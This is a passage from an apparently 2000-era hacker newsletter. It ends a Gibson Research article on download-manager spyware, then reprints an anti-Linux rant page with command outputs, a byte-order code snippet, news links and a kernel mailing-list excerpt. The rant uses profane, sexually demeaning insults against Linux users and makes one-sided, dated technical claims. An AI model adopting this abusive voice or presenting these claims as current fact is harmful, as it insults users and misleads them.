        An additional privacy risk involves whether, to what degree, and to what end, historical file downloading profiles are being compiled about individuals, whether or not they are known by name and
        address and "personally identifiable." 

        Netscape has been completely silent on this issue, whereas RealNetworks has gone absolutely ballistic over my pointing out what it has apparently lied about and what it could be doing with the data
        that has been sent to its servers. As I have repeatedly stated, I have no evidence, information, or knowledge either way. But trust is what it all boils down to, and RealNetworks' record on that score
        seems to be getting shakier with every passing day. 

                                                                     Why is a unique ID tag being transmitted at all?

        I can only address that larger question by asking: "If these companies do not care about us in any unique way - separate from everyone else (as they claim) - then WHY are they going to all the
        trouble of uniquely tagging every user's computer and deliberately transmitting not only that unique ID tag, but also - in the case of Netscape - sending the user's Internet IP address with each and
        every download file report?" This is not required for the purpose of identifying what files are downloaded "in aggregate", or learning when their downloading program is installed or removed from the
        host computer . . . contrary to what seems to be stated in their various license agreements. 

                                                                   Therefore, it is difficult to understand the motivation
                                                                  behind collecting personal data which is, on its face,
                                                                          unnecessary for the stated objective.

        One Final Observation: 

        The stated purpose behind all of this download profiling (in their respective licenses) is to inform these vendors about the files we are all (collectively) downloading so that they can provide some sort
        of additional, useful, or auxiliary information to us (this is never really made clear). Yet, the date shown for the NetZip Downloader (version 1.0.62 - which was captured in the outbound TCP/IP data
        packet shown above) is December 7th of 1998. So, this data gathering has presumably been underway since before that date. That's been quite a while. 

        When does the payback for all these years of "aggregate" user profiling begin? And who receives the value? And, moreover, given the highly dynamic nature of Internet content, does the whole idea
        of collecting such data really make any sense anyway? 

        It makes one wonder what's really going on here . . . doesn't it? 




        Certainly Newsworthy . . . 

        Frankly, once all of the facts are exposed and aired, I wouldn't blame anyone for being quite upset by the whole story. We now know, with absolute certainty, that more than 14 million NetZip
        Download Demon users have been misled by the product's license agreement. And it is this deceived "asset base" which RealNetworks recently purchased. How nice. 

        So, it's hardly surprising that the online news media has picked up on and reported the news of a Class Action Lawsuit brought against Netscape/AOL over their Smart Download spyware. These
        stories provide some additional background information about the secret spying activities of these programs: 

                                                                        Wired News: Privacy Suit Targets Netscape

                                                                    ZDNet News: AOL/Netscape hit with privacy lawsuit




        Keeping Yourself Informed 

        Within hours of my confirmation of this potentially serious privacy breach, the 338,584 current members of our User-Managed eMail Notification System received a brief piece of eMail outlining my
        findings and inviting them to examine the additional resources here for additional information and interaction. 

        So, if you are a newcomer to this site and are not already a member of our eMail Notification System, you might want to consider joining (just click the link.) As detailed in our formal Privacy
        Statement, your eMail address will never be disclosed, and you are completely free to remove yourself from the system if you ever choose to. 




        For Further Discussion . . . 

        Since my recent findings - and the questions they raise - about the behavior of the Netscape/Real Networks/NetZip download utilities were first disclosed to members of our User-Managed eMail
        Notification System, that is the topic receiving intense discussion, debate, and discovery over in our online "newsletter" discussion forum. 

                                                                            news://grc.com/newsletter

        To learn more about this problem, to share your feelings and perhaps your outrage, or to learn more about detecting and removing these utilities . . . or for virtually anything related to this topic:
        Please jump over to our "Newsletter Discussion Page", and from there into the newsletter discussion forum. 

        I'm certain you'll be glad you did! 

        And thanks very much for your interest and continued support of my work! 

                  




                                                                     The contents of this page are Copyright (c) 2000 by Gibson Research Corporation. 
                                                                     SpinRite, ChromaZone, ShieldsUP! and the iconic character "Mo" (shown above) are 
                                                                       registered trademarks of Gibson Research Corporation, Laguna Hills, CA, USA. 
                                                                        Gibson Research Corporation's GRC.COM web and customer privacy policy 
                                                                                                ~ ~ ~ 

      @HWA
      
      
312.0 [IND] Why Linux sucks.
      ~~~~~~~~~~~~~~~~~~~~~
      
      Submitted by Duro

      
      I highly recommend you visit this site, here is the general gist but there is much
      more informative material there and well worth the visit for any serious admin worth
      his salt.  - Ed
            
      http://www.spatula.net/proc/linux/index.src
      
      WHY LINUX SUCKS

      Testing? What's that? If it compiles, it is good, if it boots up, it is perfect. 
      - Linus Torvalds 

      Welcome to the beginnings of my "why linux sucks" page. There isn't much here just yet, but there are so many reasons, both technical and non-technical, that linux sucks that this page will surely fill up quickly. 
      
           I've opened the page up to linking again...except from slashdot. 
      
      Here's a short list of Linux flaws that make it look silly: 
      
           /usr/include/linux (come on. honestly.) Lame. Nonstandard. (for the clue-deprived, this means that any code written for linux using the linux/ headers will be incompatible with all other Unix flavors.) Guess what: string.h, types.h, malloc.h, signal.h, and so-on
           don't belong in a platform-specific include directory. Hope you didn't want to port your code... 
           Neither the sigaction manpage nor the signal.h includes indicate what the system defaults are. Of course, they've put signal.h in /usr/include/linux... 
           "intro" manpages are a joke. Compare the BSD section 2 intro with the one from Linux. 
           file systems mount async by default (power outage and your fs dies) 
           Most linux users don't have pubes yet and are intolerably lame (3Y3 4m 1337 H4x0r d00d [uz 3y3 h4v3 L1Nux!) 
           Too many things in user space that belong in the kernel (nfs) 
           Too many things in the kernel that belong in user space (java) 
           No standard distribution. Linux people say this is a good thing? Try writing software or software configuration instructions when you never know how the OS is going to be laid out, or try finding the responsible party for a block of OS code, or try fixing security
           problems when they arise and you'll see that this is NOT a good thing at all. 
           no consistent pronunciation of the OS's name (line-ucks? lynn-ucks?) 
           svr4? bsd? make up your mind? 
           Lame NFS & dd 
           {
           From: Alfred Perlstein 
      
      time dd if=www2_otherlocal.tar.gz of=/dev/null bs=128k
      219+1 records in
      219+1 records out
      28760021 bytes transferred in 3.411756 secs (8429683 bytes/sec)
      0.000u 0.443s 0:03.42 12.8%     91+667k 0+17io 0pf+0w  
      
      (that's freebsd)
      
      time dd if=www2_otherlocal.tar.gz of=/dev/null bs=128k
      219+1 records in
      219+1 records out
      0.010u 1.550s 0:16.00 9.7%      0+0k 0+0io 84pf+0w  
      
      (linsux)  [Redhat 5.1]
      
      this is on the same 100mbit segment.
      i'm using NFS over TCP and linux is using UDP
      both to the same Solaris 5.6 box.
      
      also, note how much linux dd sucks ass.
      
      (still smirking)
      
      Alfred Perlstein
      }
           
           #linux, #hack, #linuxwarez... 
           New kernel every week that breaks half your applications (see end of the article #breakage)
           Security flaw/Root compromise of the week (see below) 
           glibc? libc? libc5? libc6? glibc2? 
           /bin/sh != sh; /bin/sh == bash. Lame. Nonstandard. Result: broken shell scripts and nonportable code. 
           /usr/bin/make != make; /usr/bin/make == gmake. Lame. Nonstandard. Same result as above: nonportable code. 
           ext2fs 
           Linux will mount partitions that are not clean 
           can't handle partitions > 2GB (I've heard they finally fixed this one) 
           e2fsck deliberately leaves/creates corrupt files (if there is a block that is duplicated between two files, e2fsck will clone the duplicate (while fsck will remove both files. This can also result in a user gaining unauthorized access to another user's data.)) 
           it swap likes swap to swap swap too swap often swap 
           only allows 128M of swap at a time; for a 1G of swap, you need 8 swap partitions 
           can't handle more than 1GB of RAM 
           To install Joe's program, you need Bob's kernel hack, but for Bob's kernel hack, you've got to have Suzy's patches, but Suzy's patches only work with a year-old kernel, unless you get Mike's patches to Suzy's patches, but even then, those conflict with Jeff's
           drivers, which can be resolved only by installing Nancy's patches... 
           Can't handle the same IP on more than one interface 
           Can't handle large files 
           {
           Help, mommy! I can't handle the BIG files!
      
      (names have been changed to protect the innocent) 
      
      
      qqq(4)% uname -a
      SunOS qqq.zz.xxxxx.xxx 5.6 Generic_105181-07 sun4u sparc SUNW,Ultra-2
      qqq(5)% ls -l
      total 7330114
      -rw-r--r--   1 root     root     110622720 Oct 27 03:01 zzz.xxxxx.xxx.tar
      -rw-r--r--   1 root     other    313320448 Oct  7 17:06 file1.tar
      -rw-r--r--   1 root     other      5079040 Aug 16 22:33 file2.tar
      -rw-r--r--   1 root     other    1107240960 Aug 16 22:39 file3.tar
      -rw-r--r--   1 root     other     52045312 Oct 27 03:57 file4.tar
      -rw-r--r--   1 root     root     2162790400 Oct 27 21:56 file5.tar
      
      
      
      wwww(36)% uname -a
      Linux wwww.zz.xxxxx.xxx 2.1.117 #4 SMP Tue Aug 25 01:37:46 EDT 1998 i686
      unknown
      wwww(37)% ls -l
      ls: file5.tar: File too large
      total 1551913
      -rw-r--r--   1 root     root     110622720 Oct 27  1998 zzz.xxxxx.xxx.tar
      -rw-r--r--   1 root     bin      313320448 Oct  7  1998 file1.tar
      -rw-r--r--   1 root     root       5079040 Aug 16  1998 file2.tar
      -rw-r--r--   1 root     root     1107240960 Aug 16  1998 file3.tar
      -rw-r--r--   1 root     bin       52045312 Oct 27  1998 file4.tar
      }
      
           Max file size: 2GB. (*BSD: 4 Terabytes) 
           Dynamically linked root shell. Doom! 
           lilo! any boot loader that needs to have magic block numbers is wrong 
           linux icmp.h is *NOT* unix icmp.h - they're totally incompatible. 
           flatfile password files make listing large ftp directories impossible due to huge numbers of flatfile searches. 
           password file can be non-shadowed - encrypted passwords visible to all 
           shadow.h! hahahahahahaha! 
           Slowass network code (see http://www.nfr.net/nfr/SYSTEM_NOTES.html#LinuxGeneral)
           Did I mention slowass network code? (see http://neuromancer.rmci.net/linux-vs-freebsd.html)
           Oh, also slowass network code (see http://www.spatula.net/proc/linux/localhost.src)
           Miserably pathetic threading implementation doesn't scale for shit: all threads wake up on signals (stampeding process problem). 
           L1nux c0d3rz! 
           {
           3y3 wr1t3 31337 c0d3!
      
      It's amazing how terminally clueless 31337 L1nux c0d3rz can be. Those of you who follow Bugtraq, for example, have probably seen this bit of 31337 c0d3: 
      
      #ifdef STRANGE_BSD_BYTE_ORDERING_THING
      /* OpenBSD < 2.1, all FreeBSD and netBSD, BSDi < 3.0 */
      #define FIX(n) (n)
      #else /* OpenBSD 2.1, all Linux */
      #define FIX(n) htons(n)
      #endif /* STRANGE_BSD_BYTE_ORDERING_THING */
      
      Apparently these kiddies slept that day when Big and Little Endian were explained in their high school architecture classes, and also that day in their college networks class (oh wait; they're not old enough to be in college) when htons was discussed in relation to
      network byte ordering. 
      
      For you L1nux cl00b13z, you should always call htons(3) on integers you plan to stick in a network header. Htons has a platform-dependent implementation that guarantees a result in network byte order. The cl00b13 who wrote the above code not only wrote broken
      code, but also wrote code that, in effect, does absolutely nothing more than a simple call to htons(3). 
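
      What htons(3) does to a 16-bit header field, as an added example (not code from Bugtraq, the nestea exploit or the original article): it compares the bytes stored in a header buffer with and without the conversion. The demo_hdr struct, its field values and all function names are made up for the demonstration.

```c
#include <arpa/inet.h>   /* htons(), ntohs() */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical 4-byte header, constructed for this demo only. */
struct demo_hdr {
    uint16_t length;
    uint16_t ident;
};

/* 1 on a little-endian host, 0 on a big-endian one. */
int host_is_little_endian(void)
{
    uint16_t probe = 0x0102;
    unsigned char first;
    memcpy(&first, &probe, 1);
    return first == 0x02;
}

/* Read the header's bytes in memory order (first byte in the most
 * significant position) so two buffers can be compared as one number. */
static uint32_t header_bytes(const struct demo_hdr *h)
{
    unsigned char b[sizeof *h];
    memcpy(b, h, sizeof b);
    return ((uint32_t)b[0] << 24) | ((uint32_t)b[1] << 16) |
           ((uint32_t)b[2] << 8)  |  (uint32_t)b[3];
}

/* Fields converted with htons(): big-endian in the buffer on every host. */
uint32_t bytes_with_htons(uint16_t length, uint16_t ident)
{
    struct demo_hdr h;
    h.length = htons(length);
    h.ident  = htons(ident);
    return header_bytes(&h);
}

/* Fields stored unconverted, which is what the FIX(n) (n) branch does:
 * the buffer contents now depend on the host's endianness. */
uint32_t bytes_unconverted(uint16_t length, uint16_t ident)
{
    struct demo_hdr h;
    h.length = length;
    h.ident  = ident;
    return header_bytes(&h);
}

/* Receiver side: recover the length field from the first two bytes. */
uint16_t decode_length(uint32_t bytes)
{
    unsigned char b[2] = { (unsigned char)(bytes >> 24),
                           (unsigned char)(bytes >> 16) };
    uint16_t net;
    memcpy(&net, b, sizeof net);
    return ntohs(net);
}

int main(void)
{
    printf("host is %s-endian\n", host_is_little_endian() ? "little" : "big");
    printf("htons:       %08x\n", (unsigned)bytes_with_htons(0x0028, 0x1234));
    printf("unconverted: %08x\n", (unsigned)bytes_unconverted(0x0028, 0x1234));
    printf("decoded length: 0x%04x\n",
           (unsigned)decode_length(bytes_with_htons(0x0028, 0x1234)));
    return 0;
}
```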
      
      Harold Gutch said it best in a comment he inserted into the "nestea" exploit, as he corrected some stupid L1nux k1dd13 c0d3: 
      (see http://www.securityfocus.com/templates/archive.pike?list=1&date=1998-04-22&msg=19980427012153.18775@foobar.franken.de)
      
      /* bsd usage works now, the original nestea.c was broken, because some braindead 
      * linsux-c0d3r was too stupid to use sendto() correctly
      */
      }
      
           LILO can't cope with kernels > 1Mb, so the kernel has to be gzipped. 
           strfry and memfrob 
           Can't cope with hard drives > 32GB 
           GPL - a license and a virus 
           Fundamental design and direction problems. It turns out that Linus is not the smartest man in the world and the saviour of all mankind. (see #fundamental at end of article)
           OS or religion? 
           UNABLE TO LOAD INTERPRETER...memory leak much? 
           This is a real Linux error message: Uhhh. NMI recieved. Dazed and Confused. Trying to cope ...such professionalism! 
           The GNU su manpage actually says this: (see http://www.freebsd.org/cgi/man.cgi?query=su&apropos=0&sektion=0&manpath=Linux+Slackware+3.1&format=html)
      
                This program does not support a "wheel group" that restricts who can su to super-user accounts, because that can help fascist system administrators hold unwarranted power over other users. 
      
           ...apparently it's better for any user to attack the root password than to offer added security. Ignorance of security is a common Linux thread. 
           vi != vi; vi == vim. vim links to X libraries. Wipe X, and now you can't use vi. Retards. 
           Still no USB support in 2000, after NetBSD and FreeBSD have had it for nearly 2 years. So much for the "million geeks" theory of rapid software development. 
      
      I don't expect this list to be up to date; Linux is impossible enough to keep up with as a user, and it's even harder to keep up with how broken and lame it is this week. In general, the further something is down the list, the newer the information is. It's almost surprising
      how many of the older items still hold true today, until you consider the fragmented and undirected development effort. 
      
      Before you wet the briefs your mommy bought for you at Target and frantically search for a link to email me something about how "it's not like that anymore" or "how dare you insult Linux! I will h4x0r you!" or other such standard Linux sycophant drivel, consider for
      a moment that I just don't give a fuck what you have to say. I understand that it can be upsetting to you to see your precious OS exposed as the garbage it is. I've heard it all before, so you can save your energy for something more complex and important to you, like
      learning how to masturbate. (you know, like see : http://www.jackinworld.com)
      
      Perhaps the greatest crime of Linux is the production of nonportable code. The Linux c0d3rz wave the free-software flag, but they're just as bad as Microsoft in making software that can run only under their OS. 
      
      Check out my favorite Linux joke. (http://www.spatula.net/proc/linux/linux.joke.src)
      Also read aard's linux joke 
      "once upon a time there was this guy who wanted to bring his products to
      the internet for sale.  so he investigated e-commerce, and scalability,
      robustness, and synergy.
      
      and he decided to run linux."
      

      -=-
      
      
      
      News Articles, Interviews, etc
      
      Throughout all of these, it's interesting to note the typical Linux kiddie reaction to proof that their OS sucks ass. It's always something like: 
      
         1. The test wasn't "fair" 
         2. What about new kernel x.y.z? 
         3. You can't expect <reasonable expectation> 
         4. The people doing the test must be mean/biased 
         5. It wasn't tuned properly 
         6. They didn't look at the latest release of Red Hat x.y! 
      
      They really seem like 4-year-olds who have just been denied a pack of gum in a grocery store. 
      
           Linux reviews are bought- not earned (http://news.tucows.com/linux/linux07072000.html)
           Bad Linux Advocacy FAQ - a must-read (http://www.softpanorama.org/OSS/bad_linux_advocacy_faq.shtml)
           Sendmail developers have discovered a big gaping hole present in ALL linux kernels up to and including 2.2.15. (http://sendmail.net/?feed=000607linuxbug)
           Security Focus statistics page. Note how only Windows NT has had more security problems than Linux. (http://www.securityfocus.com/vdb/stats.html)
           Linux loses Wall Street's interest... fancy that: Linux, it turns out, is not the greatest thing ever (http://dailynews.yahoo.com/h/zd/20000526/tc/linux_losing_its_buzz_on_wall_street_1.html)
           Another Wall Street story of Linux firms merging, hoping to actually turn a profit. Wow! (http://dailynews.yahoo.com/h/cn/20000524/tc/linux_sellers_merge_eye_profitability_1.html)
           Linux is not mature enough for high-end computing (http://dailynews.yahoo.com/h/cn/20000517/tc/commentary_market_not_ready_for_high-end_linux_systems_1.html)
           Linuxcare go spaf! (http://dailynews.yahoo.com/htx/zd/20000522/tc/can_linuxcare_stay_afloat__1.html)
           This is hella funny (http://www.overclocked.org/OCwhinux.htm)
           Alan Cox is to blame for the big gaping hole, and didn't even catch the most foolish and common of CGI mistakes. Alan Cox is one of the lead Linux kernel coders. (http://slashdot.org/comments.pl?sid=00%2F04%2F25%2F037238&cid=121&pid=0&threshold=5&mode=flat&commentsort=0#121)
           Big gaping hole in Red Hat security. Fat fucking surprise! (http://www.msnbc.com/news/399125.asp)
           Linux is marketing and hype according to this Wall Street Journal article (http://dowjones.wsj.com/n/SB936961814325017645-d-main-c1.html)
           Linux is marketing and religion according to this ZDnet article (http://www.oreillynet.com/pub/a/freebsd/2000/03/24/bostic.html?page=2_)
           Interview with Keith Bostic including the quote "Linux and Microsoft both started from scratch, and it showed." (http://www.oreillynet.com/pub/a/freebsd/2000/03/24/bostic.html?page=2)
           ZDnet article about Linux fragmentation (http://www.zdnet.com/zdnn/stories/news/0,4586,2470425,00.html)
           Debugging is hard! let's go shopping! (http://dailynews.yahoo.com/htx/cn/20000315/tc/20000315168.html)
           Dorks. (http://biz.yahoo.com/bw/000313/ma_andover_1.html)
           The thrill is gone for Linux (http://www.zdnet.com/zdnn/stories/news/0,4586,2458906,00.html)
           Don't invest in Linux! (http://dailynews.yahoo.com/h/cn/20000229/tc/20000229058.html)
           Even the SuSe CEO says that Linux is poo (http://www.cnn.com/2000/TECH/computing/03/02/no.linux.desktop.idg/index.html)
           SCOWorld article that says, in part: 
      
                . In our tests of these operating systems, all but one of the Linux systems suffered two or more crashes during the testing period. The FreeBSD system and both SCO operating systems suffered no crashes at all. 
                (http://www.scoworld.com/jf00rdup.html)
      
           Computerworld: three UNIX systems better than Linux (http://www.computerworld.com/home/print.nsf/All/000207E972?OpenDocument&~f)
           PC Week article about how Linux is overexaggerated (http://www.zdnet.com/filters/printerfriendly/0,6061,372462-54,00.html)
           Computerworld interview with SCO's CEO calling Linux a religion. (http://www.computerworld.com/home/print.nsf/all/990426A08E)
           ZDnet article about Linux Security- and how badly it sucks ass. (http://www.zdnet.com/zdnn/stories/news/0,4586,2430772,00.html)
           Linux is Obsolete - a series of well-circulated Usenet postings in a thread started by Andy Tanenbaum, a respected Operating Systems authority. Note how Tanenbaum presents himself vs Linus having a tantrum. (http://www.educ.umu.se/~bjorn/mhonarc-files/obsolete/maillist.html)
           ZDnet article about the recent (2/14/00) Denial of Service attacks which says, in part: "The three DDoS tools in wide distribution on the Internet rely on known security vulnerabilities of Solaris and Linux." so you can thank Linux for the last wave of Denial of
           Service attacks. (http://www.zdnet.com/pcweek/stories/news/0,4153,2436770,00.html)
           JWZ's article about how linux is only free if your time has no value. For those that don't know, JWZ is a very clever guy who was deeply involved in the development of Netscape & Mozilla for some time (http://www.jwz.org/doc/linux.html)
           ZDnet review of linux as a web server, including mention of how the tcp/ip stack is broken in the 2.2 kernel, which is a perfect example of the mention above about new kernels breaking applications. (http://www.zdnet.com/devhead/stories/articles/0,4413,2258790,00.html)
           Linux: poo FreeBSD: good (http://www.idg.net/go.cgi?id=161881) (HWA runs bsd...lol - Ed)
           The Linux Myth - John Dvorak on ZDnet (http://www.zdnet.com/zdnn/stories/comment/0,5859,2338326,00.html)
           Daemon News article outlining many of the misconceptions that Linsux weenies spread about BSD. (http://www.daemonnews.org/199909/freebsd.html) (Read this too - Ed)
           Web server comparison showing that Linux is still slower than FreeBSD (http://perl.pattern.net/bench/)
           Byte Magazine article outlining how "Linux is only free if your time has no value" (http://www.byte.com/columns/Be_view/1999/06/0607Be_view.html)
           NT Magazine outlines many Linux shortcomings (http://www.ntmag.com/Magazine/Article.cfm?ArticleID=5048)
           Another NT Magazine article (http://www.ntmag.com/Magazine/Article.cfm?ArticleID=4502)
           Mindcraft says that FreeBSD outperforms Linux in this article defending their benchmarks (http://www.mindcraft.com/whitepapers/rebut-abcnews.html)
           Read what Ken Thompson has to say about Linux (http://www.spatula.net/proc/linux/thompson.src)
           FreeBSD is faster than Linux (http://www.it.fairfax.com.au/990316/openline1.html)
           NT is faster than Linux (http://www.mindcraft.com/whitepapers/nts4rhlinux.html)
           A news.com article discussing Linux shortcomings (http://news.com/News/Item/0,4,34918,00.html)
           Here's a zdnet article that details why Linux's time is over. (http://www.zdnet.com/zdnn/content/pcwk/1521/317585.html)
           NT is better than Linux (http://www.zdnet.com/pcweek/stories/columns/0,4351,377260,00.html)
           The anti-linux crusade (http://abcnews.go.com/sections/tech/FredMoody/moody981120.html)
      
      
      thanks to: urg, aard, brightmn, imperial, ee, foo, JB, cykyc 
      
      
                       
                                                                                                                  
                                                                                                                                                                                                          
       Sun Jul 30 04:31:48 EDT 2000    linux/index.src
       Updated: Fri Jul 21 2000 1:13.15
                                                                                         
      
      
      Copyright (c) 1998-1999 by Nick Johnson. All rights reserved. 
      
      #breakage
      
      From http://kt.linuxcare.com/latest.epl of 2/3/2000, here is an example of the Linux API changing and generally fucking over those who develop commercial software for it. 
      
        Block Device Interface Change And Related Pain
      
      2000/01/07 - 2000/01/11 (52 posts): [ANNOUNCE] block device interfaces changes 
      
      Alexander Viro announced that the block device interface would be changing, and that some of these changes had made it into 2.3.38; he listed: 
      
              1. New type (struct block_device) is defined. We have a cache of such objects, indexed by dev_t. struct block_device * is going to replace kdev_t for block devices. Handling of the cache is done in fs/block_dev.c 
              2. They have methods (struct block_device_operations). Currently the set is { open, release, ioctl, revalidate, check_media_change }. For now (and it's going to change) types are the same as in file_operations. However, in the near future they are going to
                become 
      
                     int (*open)(struct block_device *bdev, mode_t mode, unsigned flags);
                     int (*release)(struct block_device *bdev);
                     int (*ioctl)(struct block_device *bdev, unsigned cmd, unsigned long arg);
                     int (*revalidate)(struct block_device *bdev);
                     int (*check_media_change)(struct block_device *bdev); 
      
              3. ->revalidate() and ->check_media_change() disappeared from file_operations. 
              4. register_blkdev() takes block_device_operations instead of file_operations now. For one thing, it means that block devices are more or less insulated from all future changes in file_operations (Good Thing(tm)). For another, it means that drivers should be
                modified. I did the change for all drivers in the main tree, see the patch for details. It's pretty easy. 
              5. blkdev_open() doesn't change ->f_op. def_blk_fops has all needed methods (open, release and ioctl call the methods from block_device_operations, indeed). 
              6. Inodes got a new field: i_bdev. Filesystems should not worry about it - just remember to call init_special_inode() when you are initializing device/fifo/socket in-core inode (in foo_read_inode() or in foo_mknod(); all filesystems in the tree are doing it now).
                Contents of this field: pointer to struct block_device if it is a block device inode, NULL otherwise. 
              7. Superblocks got a new field: s_bdev. Handled by code in fs/super.c, points to the struct block_device if the mount is device-backed, NULL otherwise (i.e. for NFS, CODA, procfs, etc.). 
              8. do_mount() first argument is struct block_device * now. It does the right thing for non-device mounts - just pass NULL and it will work (allocate the anonymous device, etc.) 
              9. Instead of calling get_blkfops(), use ->bd_op in struct block_device. Moreover, better use blkdev_get()/blkdev_put()/ioctl_by_bdev() (see examples in mm/swapfile.c, drivers/char/raw.c, fs/super.c, fs/isofs/inode.c, fs/udf/lowlevel.c). 
             10. Thing that is probably going to happen RSN: instead of struct gendisk per major we may want to go for struct gendisk per _disk_. It would mean that at some point near ->open() we will put the pointer to it into the struct block_device. One obvious
                consequence being that partitions-related ioctls() will become completely generic. 
      
           Notice that it is _not_ the same as devfs (and not a beginning of moving devfs into the main tree). It just provides the backplane - no namespace, no nothing. Inodes (either in normal filesystems or in devfs) point to such animals. That's it. Eventually things like
           ->b_dev, ->b_rdev, ->i_dev, ->rq_dev, etc. are going to become pointers to such objects, but it will be done step-by-step - otherwise we'll end up with a moby patch and moby breakage in bargain... 
      
           Character devices are not affected at all - IMO using the same type both for block and character device was a mistake. So their handling remains as-is. Probably something should be done for them too, but that's completely different story. 
      
      Richard B. Johnson picked himself up off the floor and said: 
      
           Good grief Charley Brown! You, in a few key-strokes, just blew away major portions of the work done over the past few years by software engineers who ported their drivers to Linux. Linux will never be accepted as a 'professional' operating system if this
           continues. 
      
           It's enough of a problem putting one's job on-the-line convincing management to risk new product development to Linux. Once these products are in Production, and bugs are discovered in the OS, we must be able to get the latest version of the OS and have our
           drivers compile. If this is not possible, you do not have an operating system that is anything other than an interesting experiment. 
      
           For instance, there was a simple new change in the type of an object passed to poll and friends. This just cost me two weeks of unpaid work! Unpaid because I had to hide it. If anyone in Production Engineering had learned about this, the stuff would have been
           thrown out, the MicroCreeps would have settled in with "I told you so..", and at least three of us would have lost our jobs. 
      
           Industry is at war. You can't do this stuff to the only weapons we have. Once you claim to have a "Professional Operating System", its development must be handled in a professional way. If major kernel interface components continue to change, Linux is in a
           heap of trouble as are most all of those who are trying to incorporate it into new designs. 
      
           The industrial use of Linux is not at the desktop. It involves writing drivers for obscure things like machine controllers (read telescope controllers), Digital signal processors (read medical imaging processors), and other stuff you can't buy at the computer store. It
           doesn't matter if you fix all of Donald Becker's drivers to interface with the new kernel internals. You have still broken most everything that counts. 
      
      There were a number of replies to this. Alexander found Richard's post clueless and Monty-Pythonesque. On a serious (though annoyed) note, he explained, "one of the worst things about block drivers-to-kernel interface is that they share it with files. I.e. _any_
      change in file_operations or in struct file or in struct inode and you are deep in it. Change the size of any field prior to ->i_dev and you are in for recompile. Change <gasp> device number bitness and even recompile may be of little help. Removing those dependencies
      (not all of them are removed yet, more will follow) is going to save _your_ ass a year later." 
      
      Also replying to Richard, Victor Khimenko said, "Drivers MUST be changed with new kernel release (and thus via development branch: development kernels are just snapshots of development process after all). It was true from the start and it'll be true tomorrow. It's
      true for most OSes available. It's ESPECIALLY true for Linux where drivers are linked directly in kernel. If you expected something other then you made wrong choice choosing Linux." 
      
      Gregory Maxwell said to Richard: 
      
           We all know your position on compatibility. :) Many people, including myself, usually understand and agree with it. 
      
           However, you are going a little far on this one. 
      
           The change is going into 2.3.x, and that *IS* the appropriate place to break interfaces. These kinds of changes should certainly not be introduced into 2.2.x. 
      
           This should cause you little difficulty, as your example of having to upgrade to fix a bug should not apply. When you upgrade to fix a bug then you should just be increasing patchlevel. If there is not a patch for a bug in 2.2.x which is fixed in 2.4.x then there is a
           bug in the Linux development process. 
      
           In order to move forward, we *must* break things. To make up for this we continue to maintain old versions. There are still bugfixes being made against 2.0.x and there will be bugfixes against 2.2.x. RedHat even still issues updates against RH4.2.. 
      
           So if this were to have occurred within a stable kernel version, or if it had severely affected userspace, I would agree. 
      
      Rik van Riel put it this way to Richard: 
      
           Industrial use of Linux usually doesn't involve the kernels which are marked as `development', ie. where the `middle' version number is odd and where major things are expected to change. 
      
           People venturing out on that terrain can know what they're heading into (see http://kt.linuxcare.com/) and shouldn't come whining when some actual development happens in the development branch of the kernel. They should only whine when development stops,
           not when useful changes are taking place... 
      
      But David Parsons objected to Rik, "Except, of course, that when the changes go in they are never backed out so the interfaces remain stable for the production kernels. That's the *really* annoying thing about this line of argument; when else should someone
      complain that an interface has been turned into gravel? If you wait until the development tree has become a production tree, enough code will be modified to work with the New! And! Improved! interfaces that your complaints (cf: old-style fcntl locking) will be
      dismissed sight unseen by the Core Team." He added, "The big support providers are the ones who benefit from interface churning. It's the small shops that get bitten in the ass because they don't have enough money to buy programmers or enough time to do the
      patches." There was no reply to this. 
      
      Alan also replied to Richard with the quote of the day, saying, "Linux isn't at war. War involves large numbers of people making losing decisions that harm each other in a vain attempt to lose last. Linux is about winning." 
      
      At some point, Richard posted again, having received many private emails in addition to the slew on the list. He said: 
      
           I have gotten a lot of mail on this so I will reply only once. 
      
           Many of the professional industrial uses of Unix were previously covered using Sun boards, boxes and SunOs. If you ever dial 10 before a long-distance number to get a cheaper rate, that's voice over IP and we make that stuff. This was developed on Suns,
           runs on them, but will soon be running on cheap Intel clones. 
      
           If you ever have to go to the hospital and have a CAT-Scan or a MRI, you are using equipment developed by us, even though the name on the box may be Philips, General Electric, Toshiba, or various other companies. You can look http://www.analogic.com
           and see what we do for a living here. 
      
           The Sun driver interface has been constant. Unfortunately, you have to install it, meaning link it and reboot. When Installing a system, meaning the complete software package, the end-user's technician installs the OS from a CDROM. Then the application with
           its drivers are installed from another CDROM. This works on Suns and has been the De-facto standard way of doing things. 
      
           Linux was not suitable for the applications running on Suns until Linux provided the installable device driver. The ability to install a hardware-interface module into a kernel was my main selling point for using Linux to replace SunOs, and, indeed the whole Sun
           architecture. 
      
           Incidentally, the cost is the same. A CDROM for Solaris is essentially the same cost as a CDROM for Linux. Once you start distributing an operating system and supporting the distributors, a "free" operating system is no longer free. 
      
           By the time a decision was made to produce our new Exact Baggage Scanner, marketed by Lockheed-Martin, engineering management was dragging its feet on the use of Linux. They wanted something that was "everything to everybody", but didn't want the
           cost of using Suns. Further, it had to be completely under company control. 
      
           I was unable to convince anybody to use Linux so I had to write my own Operating System. It is called ARTOS (Analogic Realtime Operating System). Our Sky Computer Division, which produces the world's fastest (still) digital signal processor, made the
           high-speed stuff, a lowly Intel Pentium with my OS is used as the system controller, and an Alpha Workstation is used for the user interface. 
      
           When this was completed, we went on to producing our third generation CAT Scanner. This uses a Pentium as the main system controller and Linux as the operating system. The User Interface uses Windows-NT. It was felt that Linux was sufficiently
           well-hidden in the bowels of the machine so nobody would care. 
      
           The drivers in this machine comprise both block and character devices. One of major building blocks is the driver that interfaces to the Digital Signal Processor. This DSP board comprises up to 32 TMS-320C20 DSPs plus an i960 for interface. It is made by our
           CDA Division. 
      
           Completed data, available within a 32k window, a 512x512x16bit chunk, must be transferred to the User Interface within 1/4 second to make the specification. It does. 
      
           Now, our legal department has defined the criteria we must meet to use Linux. They presume that we will provide a "current distribution" of Linux to every end-user. They also defined that, since drivers may be deemed to modify the operating system, we have
           to provide driver source-code to the customer if they request it. Application code continues to be proprietary. 
      
           Changing the kernel interface to drivers is counter productive. In fact it makes the usual field installation impossible. The usual installation would automatically and transparently compile the interface modules, using the new Operating System. This is no longer
           possible because the compilation will fail. 
      
           Again, if Linux is to become other than an interesting experiment, one cannot change these interfaces without understanding the whole picture. 
      
           Distributors don't care. The more changes there are, the greater the obsolescence, the more money they make selling new boxes of CDROMs. Therefore there is no controlling negative feedback to be obtained from the distribution channel. You can reject
